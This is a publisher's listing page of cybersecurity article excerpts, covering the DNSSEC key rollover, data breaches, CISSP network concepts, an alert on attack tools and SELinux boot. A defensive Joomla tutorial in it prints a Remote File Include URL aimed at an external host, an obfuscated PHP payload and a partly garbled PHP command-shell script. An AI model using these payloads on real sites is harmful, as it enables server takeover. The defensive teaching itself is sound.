Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - Cybersecurity

89 Articles
article-image-redhat-shares-what-to-expect-from-next-weeks-first-ever-dnssec-root-key-rollover
Melisha Dsouza
05 Oct 2018
4 min read
Save for later

RedHat shares what to expect from next week’s first-ever DNSSEC root key rollover

Melisha Dsouza
05 Oct 2018
4 min read
On Thursday, October 11, 2018, at 16:00 UTC, ICANN will change the cryptographic key that is at the center of the DNS security system- what is called  DNSSEC. The current key has been in place since July 15, 2010. This switching of the central security key for DNS is called the "Root Key Signing Key (KSK) Rollover". The above replacement was originally planned a year back. The procedure was previously postponed because of data that suggested that a significant number of resolvers where not ready for the rollover. However, the question is 'Are your systems prepared so that DNS will keep functioning for your networks?' DNSSEC is a system of digital signatures to prevent DNS spoofing. Maintaining an up-to-date KSK is essential to ensuring DNSSEC-validating DNS resolvers continue to function following the rollover. If the KSK isn’t up to date, the DNSSEC-validating DNS resolvers will be unable to resolve any DNS queries. If the switch happens smoothly, users will not notice any visible changes and their systems will work as usual. However, if their DNS resolvers are not ready to use the new key, users may not be able to reach many websites! That being said, there’s good news for those who have been keeping up with recent DNS updates. Since this rollover was delayed for almost a year, most of the DNS resolver software has been shipping for quite some time with the new key. Users who have been up to date with this news will have their systems all set for this change. If not, we’ve got you covered! But first, let’s do a quick background check. As of today, the root zone is still signed by the old KSK with the ID 19036 also called KSK-2010. The new KSK with the ID 20326 was published in the DNS in July 2017 and is called KSK-2017. The KSK-2010 is currently used to sign itself, to sign the Root Zone Signing Key (ZSK) and to sign the new KSK-2017. The rollover only affects the KSK. The ZSK gets updated and replaced more frequently without the need to update the trust anchor inside the resolver. Source: Suse.com You can go ahead and watch ICANN’s short video to understand all about the switch Now that you have understood all about the switch, let’s go through all the checks you need to perform #1 Check if you have the new DNSSEC Root Key installed Users need to ensure they have the new DNSSEC Root key ( KSK-2017) has Key ID 20326. To check this, perform the following: - bind - see /etc/named.root.key - unbound / libunbound - see /var/lib/unbound/root.key - dnsmasq - see /usr/share/dnsmasq/trust-anchors.conf - knot-resolver - see /etc/knot-resolver/root.keys There is no need for them to restart their DNS service unless the server has been running for more than a year and does not support RFC 5011. #2 A Backup plan in case of unexpected problems The RedHat team assures users that there is very less probability of occurrence of DNS issues. Incase they do encounter a problem, they have been advised to restart their DNS server. They can try to use the  dig +dnssec dnskey. If all else fails, they should temporarily switch to a public DNS operator. #3 Check for an incomplete RFC 5011 process When the switch happens, containers or virtual machines that have old configuration files and new software would only have the soon to be removed DNSSEC Root Key. This is logged via RFC 8145 to the root name servers which provides ICANN with the above statistics. The server then updates the key via RFC 5011. But there are possibilities that it shuts down before the 30 day hold timer has been reached. It can also happen that the hold timer is reached and the configuration file cannot be written to or the file could be written to, but the image is destroyed on shutdown/reboot and a restart of the container that does not contain the new key. RedHat believes the switch of this cryptographic key will lead to an improved level of security and trust that users can have online! To know more about this rollover, head to RedHat’s official Blog. What Google, RedHat, Oracle, and others announced at KubeCon + CloudNativeCon 2018 Google, IBM, RedHat and others launch Istio 1.0 service mesh for microservices Red Hat infrastructure migration solution for proprietary and siloed infrastructure  
Read more
  • 0
  • 0
  • 3121

article-image-did-you-know-facebook-shares-the-data-you-share-with-them-for-security-reasons-with-advertisers
Natasha Mathur
28 Sep 2018
5 min read
Save for later

Did you know Facebook shares the data you share with them for ‘security’ reasons with advertisers?

Natasha Mathur
28 Sep 2018
5 min read
Facebook is constantly under the spotlight these days when it comes to controversies regarding user’s data and privacy. A new research paper published by the Princeton University researchers states that Facebook shares the contact information you handed over for security purposes, with their advertisers. This study was first brought to light by a Gizmodo writer, Kashmir Hill. “Facebook is not content to use the contact information you willingly put into your Facebook profile for advertising. It is also using contact information you handed over for security purposes and contact information you didn’t hand over at all, but that was collected from other people’s contact books, a hidden layer of details Facebook has about you that I’ve come to call “shadow contact information”, writes Hill. Recently, Facebook introduced a new feature called custom audiences. Unlike traditional audiences, the advertiser is allowed to target specific users. To do so, the advertiser uploads user’s PII (personally identifiable information) to Facebook. After the uploading is done, Facebook then matches the given PII against platform users. Facebook then develops an audience that comprises the matched users and allows the advertiser to further track the specific audience. Essentially with Facebook, the holy grail of marketing, which is targeting an audience of one, is practically possible; nevermind whether that audience wanted it or not. In today’s world, different social media platforms frequently collect various kinds of personally identifying information (PII), including phone numbers, email addresses, names and dates of birth. Majority of this PII often represent extremely accurate, unique, and verified user data. Because of this, these services have the incentive to exploit and use this personal information for other purposes. One such scenario includes providing advertisers with more accurate audience targeting. The paper titled ‘Investigating sources of PII used in Facebook’s targeted advertising’ is written by Giridhari Venkatadri, Elena Lucherini, Piotr Sapiezynski, and Alan Mislove. “In this paper, we focus on Facebook and investigate the sources of PII used for its PII-based targeted advertising feature. We develop a novel technique that uses Facebook’s advertiser interface to check whether a given piece of PII can be used to target some Facebook user and use this technique to study how Facebook’s advertising service obtains users’ PII,” reads the paper. The researchers developed a novel methodology, which involved studying how Facebook obtains the PII to provide custom audiences to advertisers. “We test whether PII that Facebook obtains through a variety of methods (e.g., directly from the user, from two-factor authentication services, etc.) is used for targeted advertising, whether any such use is clearly disclosed to users, and whether controls are provided to users to help them limit such use,” reads the paper. The paper uses size estimates to study what sources of PII are used for PII-based targeted advertising. Researchers used this methodology to investigate which range of sources of PII was actually used by Facebook for its PII-based targeted advertising platform. They also examined what information gets disclosed to users and what control users have over PII. What sources of PII are actually being used by Facebook? Researchers found out that Facebook allows its users to add contact information (email addresses and phone numbers) on their profiles. While any arbitrary email address or phone number can be added, it is not displayed to other users unless verified (through a confirmation email or confirmation SMS message, respectively). This is the most direct and explicit way of providing PII to advertisers. Researchers then further moved on to examine whether PII provided by users for security purposes such as two-factor authentication (2FA) or login alerts are being used for targeted advertising. They added and verified a phone number for 2FA to one of the authors’ accounts. The added phone number became targetable after 22 days. This proved that a phone number provided for 2FA was indeed used for PII-based advertising, despite having set the privacy controls to the choice. What control do users have over PII? Facebook allows users the liberty of choosing who can see each PII listed on their profiles, the current list of possible general settings being: Public, Friends, Only Me.   Users can also restrict the set of users who can search for them using their email address or their phone number. Users are provided with the following options: Everyone, Friends of Friends, and Friends. Facebook provides users a list of advertisers who have included them in a custom audience using their contact information. Users can opt out of receiving ads from individual advertisers listed here. But, information about what PII is used by advertisers is not disclosed. What information about how Facebook uses PII gets disclosed to the users? On adding mobile phone numbers directly to one’s Facebook profile, no information about the uses of that number is directly disclosed to them. This Information is only disclosed to users when adding a number from the Facebook website. As per the research results, there’s very little disclosure to users, often in the form of generic statements that do not refer to the uses of the particular PII being collected or that it may be used to allow advertisers to target users. “Our paper highlights the need to further study the sources of PII used for advertising, and shows that more disclosure and transparency needs to be provided to the user,” says the researchers in the paper. For more information, check out the official research paper. Ex-employee on contract sues Facebook for not protecting content moderators from mental trauma How far will Facebook go to fix what it broke: Democracy, Trust, Reality Mark Zuckerberg publishes Facebook manifesto for safeguarding against political interference
Read more
  • 0
  • 0
  • 3074

article-image-marriotts-starwood-guest-database-faces-a-massive-data-breach-affecting-500-million-user-data
Savia Lobo
03 Dec 2018
5 min read
Save for later

Marriott’s Starwood guest database faces a massive data breach affecting 500 million user data

Savia Lobo
03 Dec 2018
5 min read
Last week, a popular Hospitality company, Marriott International, unveiled details about a massive data breach, which exposed the personal and financial information of its customers. According to Marriott, this breach was happening over the past four years and collected information about customers who made reservations in its Starwood subsidiary. The information which was subject to the breach included details of approximately 500 million guests. For approximately 327 million of these guests, the information breached includes a combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences. The four-year-long breach that hit Marriott’s customer data Marriott, on September 8, 2018, received an alert from an internal security tool which reported that attempts had been taken to access the Starwood guest reservation database in the United States. Following this, Marriott carried out an investigation which revealed that their Starwood network had been accessed by attackers since 2014. According to Marriott’s news center, “On November 19, 2018, the investigation determined that there was unauthorized access to the database, which contained guest information relating to reservations at Starwood properties* on or before September 10, 2018.” For some users out of the 500 million, the information includes payment card details such as numbers and expiration dates. However,  “the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128). There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken. For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information”, stated the Marriott News release. Arne Sorenson, Marriott’s President, and Chief Executive Officer said, “We will continue to support the efforts of law enforcement and to work with leading security experts to improve.  Finally, we are devoting the resources necessary to phase out Starwood systems and accelerate the ongoing security enhancements to our network”. Marriott also reported this incident to law enforcement and are notifying regulatory authorities. This is not the first time Starwood data was breached Marriott hoteliers did not exactly mention when the breach hit them four years ago in 2014. However, its subsidiary Starwood revealed that, a few days after being acquired by Marriott, more than 50 of Starwood’s properties were breached in November 2015. According to Starwood’s disclosure at the time, that earlier breach stretched back at least one year, i.e., November 2014. According to Krebs on Security, “Back in 2015, Starwood said the intrusion involved malicious software installed on cash registers at some of its resort restaurants, gift shops and other payment systems that were not part of its guest reservations or membership systems.” In Dec. 2016, KrebsOnSecurity stated, “banks were detecting a pattern of fraudulent transactions on credit cards that had one thing in common: They’d all been used during a short window of time at InterContinental Hotels Group (IHG) properties, including Holiday Inns and other popular chains across the United States.” Marriott said that its own network has not been affected by this four-year data breach and that the investigation only identified unauthorized access to the separate Starwood network. “Marriott is providing its affected guests in the United States, Canada, and the United Kingdom a free year’s worth of service from WebWatcher, one of several companies that advertise the ability to monitor the cybercrime underground for signs that the customer’s personal information is being traded or sold”, said Krebs on Security. What should compromised users do? Companies affected by the breach or as a defense measure pay threat hunters to look out for new intrusions. They can even test their own networks and employees for weaknesses, and arrange for a drill in order to combat their breach response preparedness. For individuals who re-use the same password should try using password managers, which helps remember strong passwords/passphrases and essentially lets you use the same strong master password/passphrase across all Web sites. According to a Krebs on Security’s “assume you’re compromised” philosophy “involves freezing your credit files with the major credit bureaus and regularly ordering free copies of your credit file from annualcreditreport.com to make sure nobody is monkeying with your credit (except you).” Rob Rosenberger, Co-founder of Vmyths, urged everyone who booked a room at their properties since 2014 by tweeting advice that the affected users should change their mother’s maiden name and the social security number soon. https://twitter.com/vmyths/status/1069273409652224000 To know more about the Marriott breach in detail, visit Marriott’s official website. Uber fined by British ICO and Dutch DPA for nearly $1.2m over a data breach from 2016 Dell reveals details on its recent security breach Twitter on the GDPR radar for refusing to provide a user his data due to ‘disproportionate effort’ involved
Read more
  • 0
  • 0
  • 3045
Visually different images

article-image-preventing-remote-file-includes-attack-your-joomla-websites
Packt
15 Oct 2009
7 min read
Save for later

Preventing Remote File Includes Attack on your Joomla Websites

Packt
15 Oct 2009
7 min read
PHP is an open-source server-side scripting language. It is the basis of many web applications. It works very nicely with database platforms such as Joomla!. Since Joomla! is growing, and its popularity is increasing, malicious hackers are looking for holes. The development community has the prime responsibility to produce the most secure extensions possible. In my opinion, this comes before usability, accessibility, and so on. After all, if a beautiful extension has some glaring holes, it won't be useable. The administrators and site development folks have the next layer of responsibility to ensure that they have done everything they can to prevent attacks by checking crucial settings, patching, and monitoring logs. If these two are combined and executed properly, they will result in secure web transactions. The SQL Injections, though very nasty, can be prevented in many cases; but a RFI attack is a more difficult one to stop altogether. So, it is important that you are aware of them and know their signs. Remote File Includes An RFI vulnerability exists when an attacker can insert a script or code into a URL and command your server to execute the evil code. It is important to note that File Inclusion attacks, such as these, can mostly be mitigated by turning Register_Globals off.Turning this off ensures that the $page variable is not treated as a super-global variable, and thus does not allow an inclusion. The following is a sanitized attempt to attack a server in just such a manner: http://www.exampledomain.com/?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i? If the site in this example did not have appropriate safeguards in place, the following code would be executed: $x0b="inx72_147x65x74"; $x0c="184rx74o154x6fwex72"; echo "c162141156kx5fr157cx6bs";if (@$x0b("222x61x33e_x6d144e") or $x0c(@$x0b("x73ax66x65_mx6fde")) == "x6fx6e"){ echo "345a146x65155od145x3ao156";}else{echo "345a146ex6dox64e:x6ffx66";}exit(); ?> This code is from a group that calls itself "Crank". The purpose of this code is not known, and therefore we do not want it to be executed on our site. This attempt to insert the code appears to want my browser to execute something and report one thing or another: {echo "345a146x65155od145x3ao156";}else{ echo "345a146ex6dox64e:x6ffx66";}exit(); Here is another example of an attempted script. This one is in PHP, and would attempt to execute in the same fashion by making an insertion on the URL: <html><head><title>/// Response CMD ///</title></head><body bgcolor=DC143C><H1>Changing this CMD will result in corrupt scanning !</H1></html></head></body><?phpif((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{ini_restore("safe_mode");ini_restore("open_basedir");if((@eregi("uid",ex("id"))) || (@eregi("Windows",ex("net start")))){echo("Safe Mode of this Server is : ");echo("SafemodeOFF");}else{echo("Safe Mode of this Server is : ");echo("SafemodeON");}}...@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;}exit; This sanitized example wants to learn if we are running SAFE MODE on or off, and then would attempt to start a command shell on our server. If the attackers are successful, they will gain access to the machine and take over from there. For Windows users, a Command Shell is equivalent to running START | RUN | CMD, thus opening what we would call a "DOS prompt". Other methods of attack include the following: Evil code uploaded through session files, or through image uploads is a way of attacking. Another method of attack is the insertion or placement of code that you might think would be safe, such as compressed audio streams. These do not get inspected as they should be, and could allow access to remote resources. It is noteworthy that this can slip past even if you have set the allow_url_fopen or allow_url_include to disabled. A common method is to take input from the request POST data versus a data file. There are several other methods beyond this list. And just judging from the traffic at my sites, the list and methods change on an "irregular" basis. This highlights our need for robust security architecture, and to be very careful in accepting the user input on our websites. The Most Basic Attempt You don't always need a heavy or fancy code as in the earlier examples. Just appending a page request of sorts to the end of our URL will do it. Remember this? /?mosConfig_absolute_path=http://www.forum.com/update/xxxxx/sys_yyyyy/i? Here we're instructing the server to force our path to change in our environment to match the code located out there. Here is such a "shell": <?php$file =$_GET['evil-page'];include($file .".php");?> What Can We Do to Stop This? As stated repeatedly, in-depth defense is the most important of design considerations. Putting up many layers of defense will enable you to withstand the attacks. This type of attack can be defended against at the .htaccess level and by filtering the inputs. One problem is that we tend to forget that many defaults in PHP set up a condition for failure. Take this for instance: allow_url_fopen is on by default. "Default? Why do you care?" you may ask. This, if enabled, allows the PHP file functions such as file_get_contents(), and the ever present include and require statements to work in a manner you may not have anticipated, such as retrieving the entire contents of your website, or allowing a determined attacker to break in. Since programmers sometimes forget to do proper input filtering in their user fields, such as an input box that allows any type of data to be inputted, or code to be inserted for an injection attack. Lots of site break-ins, defacements, and worse are the result of a combination of poor programming on the coder's part, and not disabling the allow_url_fopen option. This leads to code injections as in our previous examples. Make sure you keep the Global Registers OFF. This is a biggie that will prevent much evil! There are a few ways to do this and depending on your version of Joomla!, they are handled differently. In Joomla! versions less than 1.0.13, look for this code in the globals.php // no direct accessdefined( '_VALID_MOS' ) or die( 'Restricted access' );/* * Use 1 to emulate register_globals = on * WARNING: SETTING TO 1 MAY BE REQUIRED FOR BACKWARD COMPATIBILITY * OF SOME THIRD-PARTY COMPONENTS BUT IS NOT RECOMMENDED * * Use 0 to emulate register_globals = off * NOTE: THIS IS THE RECOMMENDED SETTING FOR YOUR SITE BUT YOU MAY * EXPERIENCE PROBLEMS WITH SOME THIRD-PARTY COMPONENTS */define( 'RG_EMULATION', 0 ); Make sure the RG_EMULATION has a ZERO (0) instead of one (1). When it's installed out of the box, it is 1, meaning register_globals is set to on. In Joomla! 1.0.13 and greater (in the 1.x series), look for this field in the GLOBAL CONFIGURATION BUTTON | SERVER tab: Have you upgraded from an earlier version of Joomla!?Affects: Joomla! 1.0.13—1.0.14
Read more
  • 0
  • 0
  • 3024

article-image-bloombergs-big-hack-expose-says-china-had-microchips-on-servers-for-covert-surveillance-of-big-tech-and-big-brother-big-tech-deny-supply-chain-compromise
Savia Lobo
05 Oct 2018
4 min read
Save for later

Bloomberg's Big Hack Exposé says China had microchips on servers for covert surveillance of Big Tech and Big Brother; Big Tech deny supply chain compromise

Savia Lobo
05 Oct 2018
4 min read
According to an in-depth report by Bloomberg yesterday, Chinese spies secretly inserted microchips within servers at Apple, Amazon, the US Department of Defense, the Central Intelligence Agency, the Navy, among others. What Bloomberg’s Big Hack Exposé revealed? The tiny chips were made to be undetectable without specialist equipment. These were later implanted on to the motherboards of servers on the production line in China. These servers were allegedly assembled by Super Micro Computer Inc., a San Jose-based company, one of the world’s biggest suppliers of server motherboards. Supermicro's customers include Elemental Technologies, a streaming services startup which was acquired by Amazon in 2015 and provided the foundation for the expansion of the Amazon Prime Video platform. According to the report, the Chinese People's Liberation Army (PLA) used illicit chips on hardware during the manufacturing process of server systems in factories. How did Amazon detect these microchips? In late 2015, Elemental’s staff boxed up several servers and sent them to Ontario, Canada, for the third-party security company to test. The testers found a tiny microchip, not much bigger than a grain of rice, that wasn’t part of the boards’ original design, nested on the servers’ motherboards. Following this, Amazon reported the discovery to U.S. authorities which shocked the intelligence community. This is because, Elemental’s servers are ubiquitous and used across US key government agencies such as in Department of Defense data centers, the CIA’s drone operations, and the onboard networks of Navy warships. And Elemental was just one of the hundreds of Supermicro customers. According to the Bloomberg report, “The chips were reportedly built to be as inconspicuous as possible and to mimic signal conditioning couplers. It was determined during an investigation, which took three years to conclude, that the chip "allowed the attackers to create a stealth doorway into any network that included the altered machines.” The report claims Amazon became aware of the attack during moves to purchase streaming video compression firm Elemental Technologies in 2015. Elemental's services appear to have been an ideal target for Chinese state-sponsored attackers to conduct covert surveillance. According to Bloomberg, Apple was one of the victims of the apparent breach. Bloomberg says that Apple found the malicious chips in 2015 subsequently cutting ties with Supermicro in 2016. Amazon, Apple, and Supermicro deny supply chain compromise Amazon and Apple have both strongly denied the results of the investigation. Amazon said, "It's untrue that AWS knew about a supply chain compromise, an issue with malicious chips, or hardware modifications when acquiring Elemental. It's also untrue that AWS knew about servers containing malicious chips or modifications in data centers based in China, or that AWS worked with the FBI to investigate or provide data about malicious hardware." Apple affirms that internal investigations have been conducted based on Bloomberg queries, and no evidence was found to support the accusations. The only infected driver was discovered in 2016 on a single Supermicro server found in Apple Labs. It was this incident which may have led to the severed business relationship back in 2016, rather than the discovery of malicious chips or a widespread supply chain attack. Supermicro confirms that they were not aware of any investigation regarding the topic nor were they contacted by any government agency in this regard. Bloomberg says the denials are in direct contrast to the testimony of six current and former national security officials, as well as confirmation by 17 anonymous sources which said the nature of the Supermicro compromise was accurate. Bloomberg's investigation has not been confirmed on the record by the FBI. To know about this news in detail, visit Bloomberg News. “Intel ME has a Manufacturing Mode vulnerability, and even giant manufacturers like Apple are not immune,” say researchers Amazon increases the minimum wage of all employees in the US and UK Bloomberg says Google, Mastercard covertly track customers’ offline retail habits via a secret million dollar ad deal
Read more
  • 0
  • 0
  • 3000

article-image-telecommunications-and-network-security-concepts-cissp-exam
Packt
28 Oct 2009
5 min read
Save for later

Telecommunications and Network Security Concepts for CISSP Exam

Packt
28 Oct 2009
5 min read
Transport layer The transport layer in the TCP/IP model does two things: it packages the data given out by applications to a format that is suitable for transport over the network, and it unpacks the data received from the network to a format suitable for applications. The process of packaging the data packets received from the applications is known as encapsulation. The output of such a process is known as datagram. Similarly, the process of unpacking the datagram received from the network is known as abstraction A transport section in a protocol stack carries the information that is in the form of datagrams, Frames and Bits. Transport layer protocols There are many transport layer protocols that carry the transport layer functions. The most important ones are: Transmission Control Protocol (TCP): It is a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol. User Datagram Protocol (UDP): This protocol is similar to TCP, but is connectionless. A connection-oriented protocol is a protocol that guarantees delivery of datagram (packets) to the destination application by way of a suitable mechanism. For example, a three-way handshake syn, syn-ack, ack in TCP. The reliability of datagram delivery of such protocol is high. A protocol that does not guarantee the delivery of datagram, or packets, to the destination is known as connectionless protocol. These protocols use only one-way communication. The speed of the datagram's delivery by such protocols is high. Other transport layer protocols are as follows: Sequenced Packet eXchange (SPX): SPX is a part of the IPX/SPX protocol suit and used in Novell NetWare operating system. While Internetwork Packet eXchange (IPX) is a network layer protocol, SPX is a transport layer protocol. Stream Control Transmission Protocol (SCTP): It is a connection-oriented protocol similar to TCP, but provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in Unix-like operating systems. Appletalk Transaction Protocol (ATP): It is a proprietary protocol developed for Apple Macintosh computers. Datagram Congestion Control Protocol (DCCP): As the name implies, it is a transport layer protocol used for congestion control. Applications include Internet telephony and video or audio streaming over the network. Fiber Channel Protocol (FCP): This protocol is used in high-speed networking such as Gigabit networking. One of its prominent applications is Storage Area Network (SAN). SAN is network architecture that's used for attaching remote storage devices such as tape drives, disk arrays, and so on to the local server. This facilitates the use of storage devices as if they were local devices. In the following sections we'll review the most important protocols—TCP and UDP. Transmission Control Protocol (TCP) TCP is a connection-oriented protocol that is widely used in Internet communications. As the name implies, a protocol has two primary functions. The primary function of TCP is the transmission of datagram between applications, while the secondary function is related to controls that are necessary for ensuring reliable transmissions. Protocol / Service Transmission Control Protocol (TCP) Layer(s) TCP works in the transport layer of the TCP/IP model Applications Applications where the delivery needs to be assured such as email, World Wide Web (WWW), file transfer, and so on use TCP for transmission Threats Service disruption Vulnerabilities Half-open connections Attacks Denial-of- service attacks such as TCP SYN attacks Connection hijacking such as IP Spoofing attacks Countermeasures Syn cookies Cryptographic solutions   A half-open connection is a vulnerability in TCP implementation. TCP uses a three-way handshake to establish or terminate connections. Refer to the following illustration: In a three-way handshake, first the client (workstation) sends a request to the server (www.some_website.com). This is known as an SYN request. The server acknowledges the request by sending SYN-ACK and, in the process, creates a buffer for that connection. The client does a final acknowledgement by sending ACK. TCP requires this setup because the protocol needs to ensure the reliability of packet delivery. If the client does not send the final ACK, then the connection is known as half-open. Since the server has created a buffer for that connection, certain amounts of memory or server resources are consumed. If thousands of such half-open connections are created maliciously, the server resources may be completely consumed resulting in a denial-of-service to legitimate requests. TCP SYN attacks are technically establishing thousands of half-open connections to consume the server resources. Two actions can be taken by an attacker. The attacker, or malicious software, will send thousands of SYN to the server and withhold the ACK. This is known as SYN flooding. Depending on the capacity of the network bandwidth and the server resources, in a span of time the entire resources will be consumed. This will result in a denial-of-service. If the source IP were blocked by some means, then the attacker, or the malicious software, would try to spoof the source IP addresses to continue the attack. This is known as SYN spoofing. SYN attacks, such as SYN flooding and SYN spoofing, can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. The server creates a cookie with the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on an algorithm, which it sends as SYN-ACK. When the server receives an ACK, it checks the details and creates the connection. A cookie is a piece of information, usually in a form of text file, sent by the server to client. Cookies are generally stored on a client's computer and are used for purposes such as authentication, session tracking, and management. User Datagram Protocol (UDP) UDP is a connectionless protocol similar to TCP. However, UDP does not provide delivery guarantee of data packets.  
Read more
  • 0
  • 0
  • 2990
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $15.99/month. Cancel anytime
article-image-5-nation-joint-activity-alert-report-finds-most-threat-actors-use-publicly-available-tools-for-cyber-attacks
Melisha Dsouza
12 Oct 2018
4 min read
Save for later

5 nation joint Activity Alert Report finds most threat actors use publicly available tools for cyber attacks

Melisha Dsouza
12 Oct 2018
4 min read
NCCIC, in collaboration with cybersecurity authorities of  Australia, Canada, New Zealand, the United Kingdom, and the United States has released a joint ‘Activity Alert Report’. This report highlights five publicly available tools frequently observed in cyber attacks worldwide. Today, malicious tools are available free for use and can be misused by cybercriminals to endanger public security and privacy. There are numerous cyber incidents encountered on a daily basis that challenge even the most secure network and exploit confidential information across finance, government, health sectors. What’s surprising is that a majority of these exploits are caused by freely available tools that find loopholes in security systems to achieve an attacker’s objectives. The report highlights the five most frequently used tools that are used by cybercriminals all over the globe to perform cyber crimes. These fall into five categories: #1 Remote Access Trojan: JBiFrost Once the  RAT program is installed on a victim’s machine, it allows remote administrative control of the system. It can then be used to exploit the system as per the hacker’s objectives. For example, installing malicious backdoors to obtain confidential data. These are often difficult to detect because they are designed to not appear in lists of running programs and to mimic the behavior of legitimate applications. RATs also disable network analysis tools (e.g., Wireshark) on the victim’s system. Operating systems Windows, Linux, MAC OS X, and Android are susceptible to this threat. Hackers spammed companies with emails to infiltrate their systems with the Adwind RAT into their systems. The entire story can be found on Symantec’s blog. #2 Webshell: China Chopper The China Chopper is being used widely since 2012. These webshells are malicious scripts which are uploaded to a target system to grant the hacker remote access to administrative capabilities on the system. The hackers can then pivot to additional hosts within a network. China Chopper consists of the client-side, which is run by the attacker, and the server, which is installed on the victim server and is also attacker-controlled. The client can issue terminal commands and manage files on the victim server. It can then upload and download files to and from the victim using  wget. They can then either modify or delete the existing files. #3 Credential Stealer: Mimikatz Mimikatz is mainly used by attackers to access the memory within a targeted Windows system and collect the credentials of logged in users. These credentials can be then used to give access to other machines on a network. Besides obtaining credentials, the tool can obtain Local Area Network Manager and NT LAN Manager hashes, certificates, and long-term keys on Windows XP (2003) through Windows 8.1 (2012r2). When the "Invoke-Mimikatz" PowerShell script is used to operate Mimikatz, its activity is difficult to isolate and identify. In 2017, this tool was used in combination with NotPetya infected hundreds of computers in Russia and Ukraine. The attack paralysed systems and disabled the subway payment systems. The good news is that Mimikatz can be detected by most up-to-date antivirus tools. That being said, hackers can modify Mimikatz code to go undetected by antivirus. # 4 Lateral Movement Framework: PowerShell Empire PowerShell Empire is a post-exploitation or lateral movement tool. It allows an attacker to move around a network after gaining initial access. This tool can be used to generate executables for social engineering access to networks. The tool consists of a a threat actor that can escalate privileges, harvest credentials, exfiltrate information, and move laterally across a network. Traditional antivirus tools fail to detect PowerShell Empire. In 2018, the tool was used by hackers sending out Winter Olympics-themed socially engineered emails and malicious attachments in a spear-phishing campaign targeting several South Korean organizations. # 5 C2 Obfuscation and Exfiltration: HUC Packet Transmitter HUC Packet Transmitter (HTran) is a proxy tool used by attackers to obfuscate their location. The tool intercepts and redirects the Transmission Control Protocol (TCP) connections from the local host to a remote host. This makes it possible to detect an attacker’s communications with victim networks. HTran uses a threat actor to facilitate TCP connections between the victim and a hop point. Threat actors can then redirect their packets through multiple compromised hosts running HTran to gain greater access to hosts in a network. The research encourages everyone to use the report to stay informed about the potential network threats due to these malicious tools. They also provide a complete list of detection and prevention measures for each tool in detail. You can head over to the official site of the US-CERT for more information on this research. 6 artificial intelligence cybersecurity tools you need to know How will AI impact job roles in Cybersecurity New cybersecurity threats posed by artificial intelligence  
Read more
  • 0
  • 0
  • 2971

article-image-booting-system
Packt
27 Feb 2015
12 min read
Save for later

Booting the System

Packt
27 Feb 2015
12 min read
In this article by William Confer and William Roberts, author of the book, Exploring SE for Android, we will learn once we have an SE for Android system, we need to see how we can make use of it, and get it into a usable state. In this article, we will: Modify the log level to gain more details while debugging Follow the boot process relative to the policy loader Investigate SELinux APIs and SELinuxFS Correct issues with the maximum policy version number Apply patches to load and verify an NSA policy (For more resources related to this topic, see here.) You might have noticed some disturbing error messages in dmesg. To refresh your memory, here are some of them: # dmesg | grep –i selinux <6>SELinux: Initializing. <7>SELinux: Starting in permissive mode <7>SELinux: Registering netfilter hooks <3>SELinux: policydb version 26 does not match my version range 15-23 ... It would appear that even though SELinux is enabled, we don't quite have an error-free system. At this point, we need to understand what causes this error, and what we can do to rectify it. At the end of this article, we should be able to identify the boot process of an SE for Android device with respect to policy loading, and how that policy is loaded into the kernel. We will then address the policy version error. Policy load An Android device follows a boot sequence similar to that of the *NIX booting sequence. The boot loader boots the kernel, and the kernel finally executes the init process. The init process is responsible for managing the boot process of the device through init scripts and some hard coded logic in the daemon. Like all processes, init has an entry point at the main function. This is where the first userspace process begins. The code can be found by navigating to system/core/init/init.c. When the init process enters main (refer to the following code excerpt), it processes cmdline, mounts some tmpfs filesystems such as /dev, and some pseudo-filesystems such as procfs. For SE for Android devices, init was modified to load the policy into the kernel as early in the boot process as possible. The policy in an SELinux system is not built into the kernel; it resides in a separate file. In Android, the only filesystem mounted in early boot is the root filesystem, a ramdisk built into boot.img. The policy can be found in this root filesystem at /sepolicy on the UDOO or target device. At this point, the init process calls a function to load the policy from the disk and sends it to the kernel, as follows: int main(int argc, char *argv[]) { ...   process_kernel_cmdline();   unionselinux_callback cb;   cb.func_log = klog_write;   selinux_set_callback(SELINUX_CB_LOG, cb);     cb.func_audit = audit_callback;   selinux_set_callback(SELINUX_CB_AUDIT, cb);     INFO(“loading selinux policyn”);   if (selinux_enabled) {     if (selinux_android_load_policy() < 0) {       selinux_enabled = 0;       INFO(“SELinux: Disabled due to failed policy loadn”);     } else {       selinux_init_all_handles();     }   } else {     INFO(“SELinux:  Disabled by command line optionn”);   } … In the preceding code, you will notice the very nice log message, SELinux: Disabled due to failed policy load, and wonder why we didn't see this when we ran dmesg before. This code executes before setlevel in init.rc is executed. The default init log level is set by the definition of KLOG_DEFAULT_LEVEL in system/core/include/cutils/klog.h. If we really wanted to, we could change that, rebuild, and actually see that message. Now that we have identified the initial path of the policy load, let's follow it on its course through the system. The selinux_android_load_policy() function can be found in the Android fork of libselinux, which is in the UDOO Android source tree. The library can be found at external/libselinux, and all of the Android modifications can be found in src/android.c. The function starts by mounting a pseudo-filesystem called SELinuxFS. In systems that do not have sysfs mounted, the mount point is /selinux; on systems that have sysfs mounted, the mount point is /sys/fs/selinux. You can check mountpoints on a running system using the following command: # mount | grep selinuxfs selinuxfs 